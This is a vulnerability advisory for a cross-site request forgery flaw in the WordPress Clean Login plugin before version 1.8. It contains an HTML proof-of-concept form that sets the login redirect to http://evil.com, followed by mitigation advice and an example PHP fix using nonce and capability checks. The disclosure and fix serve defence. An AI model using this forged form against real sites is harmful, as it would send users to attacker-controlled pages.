WordPress Clean Login Cross Site Request Forgery

WordPress Clean Login plugin versions prior to 1.8 suffer from a cross site request forgery vulnerability.



Software Description


Software: Clean Login

Description: Responsive Frontend Login and Registration plugin.




A CSRF vulnerability in the WordPress plugin Clean Login allows a remote attacker to change the WordPress login redirect URL or logout redirect URL to an evil address.




<form method="POST" action="">
<input type="text" name="adminbar" value="on">
<input type="text" name="emailnotificationcontent" value="">
<input type="text" name="termsconditionsMSG" value="">
<input type="text" name="termsconditionsURL" value="">
<input type="text" name="urlredirect" value="http://">
<input type="text" name="loginredirect" value="on">
<input type="text" name="loginredirect_url" value="http://evil.com">
<input type="text" name="logoutredirect_url" value="">
<input type="text" name="cl_hidden_field" value="hidden_field_to_update_others">
<input type="text" name="Submit" value="Save Changes">
<input type="submit">
</form>





Disable the plugin until a new version is released that fixes this bug.
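
The usual fix for this class of bug in a WordPress settings handler is a nonce check plus a capability check. The sketch below is an added example, not Clean Login's code or its 1.8 patch. The field names are taken from the form above; the `example_` functions, option names, nonce names and the `admin_init` hook are assumptions.

```php
<?php
// Added example: hypothetical settings handler, not Clean Login's real code.
// Field names come from the form above; option and nonce names are assumptions.

const EXAMPLE_NONCE_ACTION = 'example_cl_save_settings';
const EXAMPLE_NONCE_FIELD  = 'example_cl_nonce';

// Render side: call inside the settings <form> to emit a hidden token
// bound to the logged-in user, the action name and a time window.
function example_cl_render_nonce() {
    wp_nonce_field( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD );
}

// Save side: accept the POST only if it carries a valid nonce and comes
// from a user who is allowed to change site options.
function example_cl_save_settings() {
    // A fixed marker field identifies the form; it does not authenticate it.
    if ( ! isset( $_POST['cl_hidden_field'] )
        || 'hidden_field_to_update_others' !== $_POST['cl_hidden_field'] ) {
        return; // not this form's submission
    }

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // Stops the request if the nonce is missing, wrong or expired.
    // A form hosted on another site cannot read this value, so the
    // forged POST shown above fails here.
    check_admin_referer( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD );

    foreach ( array( 'loginredirect_url', 'logoutredirect_url' ) as $field ) {
        $raw = isset( $_POST[ $field ] ) ? wp_unslash( $_POST[ $field ] ) : '';
        // Allow only http/https URLs.
        $url = esc_url_raw( $raw, array( 'http', 'https' ) );
        // Optional hardening, if off-site redirects are not needed:
        // hosts outside WordPress's allowed list collapse to ''.
        $url = wp_validate_redirect( $url, '' );
        update_option( 'example_cl_' . $field, $url );
    }
}
add_action( 'admin_init', 'example_cl_save_settings' );
```
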




https://wordpress.org/plugins/clean-login/#developers (1.8 version update)
